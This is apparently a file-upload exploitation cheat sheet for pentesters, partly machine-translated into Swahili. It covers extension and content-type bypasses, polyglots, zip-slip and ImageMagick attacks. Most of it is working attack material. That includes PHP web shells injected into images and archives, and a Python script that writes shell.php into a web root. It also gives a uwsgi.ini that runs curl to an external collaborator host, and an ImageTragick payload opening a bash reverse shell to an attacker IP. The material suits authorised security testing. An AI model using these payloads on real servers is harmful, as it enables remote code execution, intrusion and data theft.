File Upload

Reading time: 18 minutes

File Upload General Methodology

Other useful extensions:

• PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
• Working in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
• ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
• Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
• Coldfusion: .cfm, .cfml, .cfc, .dbm
• Flash: .swf
• Perl: .pl, .cgi
• Erlang Yaws Web Server: .yaws

Bypass file extensions checks

1. Ikiwa zinahusika, angalia nyongeza za awali. Pia jaribu kutumia herufi kubwa: pHp, .pHP5, .PhAr ...
2. Angalia kuongeza nyongeza halali kabla ya nyongeza ya utekelezaji (tumia nyongeza za awali pia):

• file.png.php
• file.png.Php5

3. Jaribu kuongeza herufi maalum mwishoni. Unaweza kutumia Burp kujaribu herufi zote za ascii na Unicode. (Kumbuka kwamba unaweza pia kujaribu kutumia nyongeza zilizotajwa awali)

• file.php%20
• file.php%0a
• file.php%00
• file.php%0d%0a
• file.php/
• file.php.\
• file.
• file.php....
• file.pHp5....

4. Jaribu kupita ulinzi kwa kudanganya parser ya nyongeza ya upande wa seva kwa mbinu kama kuongeza nyongeza au kuongeza data za junk (bytes za null) kati ya nyongeza. Unaweza pia kutumia nyongeza za awali kuandaa payload bora.

• file.png.php
• file.png.pHp5
• file.php#.png
• file.php%00.png
• file.php\x00.png
• file.php%0a.png
• file.php%0d%0a.png
• file.phpJunk123png

5. Ongeza tabaka lingine la nyongeza kwa ukaguzi wa awali:

• file.png.jpg.php
• file.php%00.png%00.jpg

6. Jaribu kuweka nyongeza ya exec kabla ya nyongeza halali na uombe ili seva iwe na usanidi mbaya. (inayofaa kutumia katika usanidi mbaya wa Apache ambapo chochote chenye nyongeza _.php**_, lakini si lazima kumalizika kwa .php** kitaendesha msimbo):

• ex: file.php.png

7. Kutumia NTFS alternate data stream (ADS) katika Windows. Katika kesi hii, herufi ya koloni “:” itaingizwa baada ya nyongeza iliyokatazwa na kabla ya ile inayoruhusiwa. Kama matokeo, faili tupu yenye nyongeza iliyokatazwa itaundwa kwenye seva (mfano “file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama vile kutumia jina lake fupi. Mwelekeo “::$data” unaweza pia kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza herufi ya nukta baada ya mwelekeo huu pia kunaweza kuwa na manufaa kupita vizuizi zaidi (.e.g. “file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Nyongeza halali inakatwa. Na PHP mbaya inabaki. AAA<--SNIP-->AAA.php

# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ab3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png

Bypass Content-Type, Magic Number, Compression & Resizing

• Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream

1. Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

• Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata:
  exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\ or you could also introduce the payload directly in an image:
  echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
• If compressions is being added to your image, for example using some standard PHP libraries like PHP-GD, the previous techniques won't be useful it. However, you could use the PLTE chunk technique defined here to insert some text that will survive compression.
• Github with the code
• The web page cold also be resizing the image, using for example the PHP-GD functions imagecopyresized or imagecopyresampled. However, you could use the IDAT chunk technique defined here to insert some text that will survive compression.
• Github with the code
• Another technique to make a payload that survives an image resizing, using the PHP-GD function thumbnailImage. However, you could use the tEXt chunk technique defined here to insert some text that will survive compression.
• Github with the code

Other Tricks to check

• Find a vulnerability to rename the file already uploaded (to change the extension).
• Find a Local File Inclusion vulnerability to execute the backdoor.
• Possible Information disclosure:

1. Upload several times (and at the same time) the same file with the same name
2. Upload a file with the name of a file or folder that already exists
3. Uploading a file with “.”, “..”, or “…” as its name. For instance, in Apache in Windows, if the application saves the uploaded files in “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory.
4. Upload a file that may not be deleted easily such as “…:.jpg” in NTFS. (Windows)
5. Upload a file in Windows with invalid characters such as |<>*?” in its name. (Windows)
6. Upload a file in Windows using reserved (forbidden) names such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.

• Try also to upload an executable (.exe) or an .html (less suspicious) that will execute code when accidentally opened by victim.

Special extension tricks

If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.

The .phar files are like the .jar for java, but for php, and can be used like a php file (executing it with php, or including it inside a script...)

The .inc extension is sometimes used for php files that are only used to import files, so, at some point, someone could have allow this extension to be executed.

Jetty RCE

If you can upload a XML file into a Jetty server you can obtain RCE because new *.xml and *.war are automatically processed. So, as mentioned in the following image, upload the XML file to $JETTY_BASE/webapps/ and expect the shell!

uWSGI RCE

For a detailed exploration of this vulnerability check the original research: uWSGI RCE Exploitation.

Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the .ini configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as @(filename), is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is processed.

Consider the following example of a harmful uwsgi.ini file, showcasing various schemes:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Utekelezaji wa payload unafanyika wakati wa kuchambua faili ya usanidi. Ili usanidi uweze kuanzishwa na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (labda baada ya ajali au kutokana na shambulio la Denial of Service) au faili lazima iwekwe kwenye auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinarejesha faili kwa vipindi vilivyotajwa baada ya kugundua mabadiliko.

Ni muhimu kuelewa tabia ya kulegeza ya uchambuzi wa faili ya usanidi wa uWSGI. Kwa haswa, payload iliyozungumziwa inaweza kuingizwa kwenye faili ya binary (kama picha au PDF), na hivyo kupanua wigo wa uwezekano wa unyakuzi.

wget File Upload/SSRF Trick

Katika baadhi ya matukio unaweza kupata kwamba seva inatumia wget ili kupakua faili na unaweza kuashiria URL. Katika matukio haya, msimbo unaweza kuwa unakagua kwamba kiambatisho cha faili zilizopakuliwa kiko ndani ya orodha ya ruhusa ili kuhakikisha kwamba faili tu zilizoruhusiwa zitapakuliwa. Hata hivyo, ukaguzi huu unaweza kupuuziliwa mbali.
Urefu wa juu wa jina la faili katika linux ni 255, hata hivyo, wget inakata majina ya faili hadi 236 herufi. Unaweza kupakua faili inayoitwa "A"*232+".php"+".gif", jina hili la faili litakuwa bypass ukaguzi (kama katika mfano huu ".gif" ni kiambatisho halali) lakini wget itabadilisha jina la faili kuwa "A"*232+".php".

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Kumbuka kwamba chaguo lingine unaloweza kufikiria ili kupita ukaguzi huu ni kufanya seva ya HTTP irejeleze kwenye faili tofauti, hivyo URL ya awali itapita ukaguzi na kisha wget itashusha faili lililorejelewa kwa jina jipya. Hii haitafanya kazi isipokuwa wget inatumika na parameta --trust-server-names kwa sababu wget itashusha ukurasa ulioelekezwa kwa jina la faili lililoonyeshwa kwenye URL ya awali.

Zana

• Upload Bypass ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Wavuvi wa Makosa katika kupima mifumo ya upakiaji faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia udhaifu, kuhakikisha tathmini kamili za programu za wavuti.

Kutoka kwa Upakiaji wa Faili hadi Udhaifu Mwingine

• Weka jina la faili kuwa ../../../tmp/lol.png na jaribu kufikia path traversal
• Weka jina la faili kuwa sleep(10)-- -.jpg na unaweza kuwa na uwezo wa kufikia SQL injection
• Weka jina la faili kuwa <svg onload=alert(document.domain)> ili kufikia XSS
• Weka jina la faili kuwa ; sleep 10; ili kupima baadhi ya kuingilia amri (zaidi ya mbinu za kuingilia amri hapa)
• XSS katika upakiaji wa faili ya picha (svg)
• JS faili upakiaji + XSS = Kudhulumu Wafanyakazi wa Huduma
• XXE katika upakiaji wa svg
• Open Redirect kupitia upakiaji wa faili ya svg
• Jaribu payloads tofauti za svg kutoka https://github.com/allanlw/svg-cheatsheet
• Udhaifu maarufu wa ImageTrick
• Ikiwa unaweza kuonyesha seva ya wavuti kukamata picha kutoka URL unaweza kujaribu kudhulumu SSRF. Ikiwa picha hii itahifadhiwa katika tovuti ya umma, unaweza pia kuonyesha URL kutoka https://iplogger.org/invisible/ na kuiba taarifa za kila mtembezi.
• XXE na CORS kupita na upakiaji wa PDF-Adobe
• PDFs zilizoundwa kwa makini kwa XSS: ukurasa ufuatao unaonyesha jinsi ya kuingiza data za PDF ili kupata utekelezaji wa JS. Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF ambayo itatekeleza JS isiyo ya kawaida kufuata maelekezo yaliyotolewa.
• Pakia maudhui ya [eicar](https://secure.eicar.org/eicar.com.txt) ili kuangalia ikiwa seva ina antivirus
• Angalia ikiwa kuna kikomo cha saizi katika upakiaji wa faili

Hapa kuna orodha ya juu 10 ya mambo ambayo unaweza kufikia kwa kupakia (kutoka hapa):

1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
2. SVG: Stored XSS / SSRF / XXE
3. GIF: Stored XSS / SSRF
4. CSV: CSV injection
5. XML: XXE
6. AVI: LFI / SSRF
7. HTML / JS : HTML injection / XSS / Open redirect
8. PNG / JPEG: Pixel flood attack (DoS)
9. ZIP: RCE kupitia LFI / DoS
10. PDF / PPTX: SSRF / BLIND XXE

Burp Extension

GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy

Magic Header Bytes

• PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
• JPG: "\xff\xd8\xff"

Rejelea https://en.wikipedia.org/wiki/List_of_file_signatures kwa aina nyingine za faili.

Zip/Tar Faili Zilizopakiwa Zitaondolewa Kiotomatiki

Ikiwa unaweza kupakia ZIP ambayo itakuaondolewa ndani ya seva, unaweza kufanya mambo 2:

Symlink

Pakia kiungo kinachokuwa na viungo laini kwa faili nyingine, kisha, kwa kufikia faili zilizondolewa utapata faili zilizounganishwa:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Decompress in different folders

Uundaji usiotarajiwa wa faili katika saraka wakati wa uundaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za kiwango cha OS kupitia upakiaji wa faili zenye uharibifu, msaada wa uhamasishaji wa kihierarkia na uwezo wa kupita kwenye saraka wa muundo wa ZIP unaweza kutumika. Hii inawawezesha washambuliaji kupita vizuizi na kutoroka saraka salama za upakiaji kwa kubadilisha kazi ya uundaji ya programu inayolengwa.

Kibao cha kiotomatiki cha kutengeneza faili kama hizo kinapatikana kwenye evilarc on GitHub. Chombo kinaweza kutumika kama inavyoonyeshwa:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Zaidi ya hayo, njia ya symlink na evilarc ni chaguo. Ikiwa lengo ni kulenga faili kama /flag.txt, symlink kwa faili hiyo inapaswa kuundwa katika mfumo wako. Hii inahakikisha kwamba evilarc haitakutana na makosa wakati wa operesheni yake.

Hapa kuna mfano wa msimbo wa Python unaotumika kuunda faili la zip la uhalifu:

#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Kukandamiza compression kwa ajili ya file spraying

Kwa maelezo zaidi angalia chapisho la asili katika: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

1. Kuunda PHP Shell: Msimbo wa PHP umeandikwa ili kutekeleza amri zinazopitishwa kupitia mabadiliko ya $_REQUEST.

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

2. File Spraying na Uundaji wa Faili Zilizoshinikizwa: Faili nyingi zinaandaliwa na archive ya zip inakusanywa ikijumuisha faili hizi.

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php

3. Mabadiliko kwa kutumia Hex Editor au vi: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au mhariri wa hex, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.

:set modifiable
:%s/xxA/..\//g
:x!

ImageTragic

Pakia maudhui haya yenye kiambatisho cha picha ili kutumia udhaifu (ImageMagick , 7.0.1-1) (fanya kutoka kwa exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Kuunganisha PHP Shell kwenye PNG

Kuunganisha PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi operesheni fulani za usindikaji wa picha. Kazi za imagecopyresized na imagecopyresampled kutoka PHP-GD ni muhimu katika muktadha huu, kwani hutumiwa mara nyingi kwa ajili ya kubadilisha saizi na kusampuli picha, mtawalia. Uwezo wa PHP shell iliyounganishwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.

Uchunguzi wa kina wa mbinu hii, ikiwa ni pamoja na mbinu zake na matumizi yanayowezekana, unapatikana katika makala ifuatayo: "Encoding Web Shells in PNG IDAT chunks". Rasilimali hii inatoa ufahamu wa kina wa mchakato na athari zake.

Taarifa zaidi katika: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Faili za Polyglot

Faili za polyglot hutumikia kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons ambazo zinaweza kuwepo kwa halali katika muundo wa faili mbalimbali kwa wakati mmoja. Mfano wa kuvutia ni GIFAR, mchanganyiko unaofanya kazi kama GIF na archive ya RAR. Faili kama hizi hazijazuiliwa kwa mchanganyiko huu; mchanganyiko kama GIF na JS au PPT na JS pia yanaweza.

Faida kuu ya faili za polyglot inategemea uwezo wao wa kupita hatua za usalama ambazo zinachuja faili kulingana na aina. Katika mazoea ya kawaida katika programu mbalimbali, inaruhusiwa tu aina fulani za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayoweza kutokea kutokana na muundo hatari (k.m., JS, PHP, au faili za Phar). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo wa aina mbalimbali za faili, inaweza kupita kwa siri vizuizi hivi.

Licha ya uwezo wao wa kubadilika, polyglots wanakutana na vikwazo. Kwa mfano, ingawa polyglot inaweza kuwa na faili ya PHAR (PHp ARchive) na JPEG kwa wakati mmoja, mafanikio ya kupakia kwake yanaweza kutegemea sera za upanuzi wa faili za jukwaa. Ikiwa mfumo unakuwa mkali kuhusu upanuzi unaoruhusiwa, muundo wa polyglot peke yake huenda usitoshe kuhakikisha kupakia kwake.

Taarifa zaidi katika: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Pakia JSON halali kama PDF

Jinsi ya kuepuka kugundua aina ya faili kwa kupakia faili halali ya JSON hata kama hairuhusiwi kwa kudanganya faili ya PDF (mbinu kutoka hiki kipande cha blog):

• mmmagic maktaba: Kadri tu %PDF bytes za uchawi ziko katika bytes 1024 za kwanza ni halali (pata mfano kutoka kwa chapisho)
• pdflib maktaba: Ongeza muundo wa PDF wa uongo ndani ya faili ya JSON ili maktaba ifikirie ni PDF (pata mfano kutoka kwa chapisho)
• file binary: Inaweza kusoma hadi bytes 1048576 kutoka kwa faili. Unda tu JSON kubwa zaidi ya hiyo ili isiweze kuchambua maudhui kama JSON na kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiria ni PDF

Marejeleo

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
• https://github.com/modzero/mod0BurpUploadScanner
• https://github.com/almandin/fuxploider
• https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
• https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
• https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
• https://blog.doyensec.com/2025/01/09/cspt-file-upload.html